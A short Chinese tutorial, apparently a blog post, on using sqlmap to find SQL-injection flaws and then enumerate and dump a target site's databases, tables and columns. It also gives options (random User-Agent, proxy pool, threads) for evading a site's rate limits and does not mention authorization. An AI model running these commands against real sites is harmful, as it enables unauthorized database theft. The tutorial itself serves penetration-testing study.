Sqlmap是用python2所写的脚本程序,用来对Web应用进行“sql注入漏洞”自动化测试
可以说是Web渗透测试“护发”利器之一
下面总结一下使用它,对网站测试Sql注入漏洞
最简单、常用到的指令
一、操作环境
- Windows10
- cmd
- python2.7
二、基本命令
1. 选择目标网址测试
sqlmap -u 目标网址
2. 确认存在漏洞后,爆破出数据库
sqlmap -u 目标网址 --dbs
3. 选择一个数据库,爆破出有多少表
sqlmap -u 目标网址 --tables -D 目标数据库名
4. 爆破出表中的字段信息
sqlmap -u 目标网址 --columns -T 目标表名 -D 目标数据库名
5. 尝试破解所选字段里的内容,并转存到本地计算机
sqlmap -u 目标网址 --dump -C 目标字段 -T 目标表名 -D 目标数据库名
三、可选,但常用的指令
1. 随机选择“User-Agent”
某些站点会对过高频率访问的用户
识别他们的“User-Agent”,来做出限制
利用sqlmap自带的随机选择Agent参数,来应对
sqlmap -u 目标 --random-agent
2. 选择代理服务器,访问目标
理由同上,网站采取更加严格的防护
限制过高频率访问的IP地址,对网站的请求
要使用代理,需要自己搭建一个代理池
sqlmap -u --proxy=http://127.0.0.1:端口号
3. 破解线程设置
sqlmap -u --threads 5
四、总结
实际操作中,经常需要用到“--random-agent”,“--proxy”等指令
原因是,网站通常会对高频率访问的用户,做出一些限制,确保网站能够正常访问
这时候我们就需要采用灵活的应对策略
来确保测试的正常进行。
以上这些操作,是目标站点没有WAF保护时的一些操作。
当然,sql还能做更多。
以后慢慢学习~
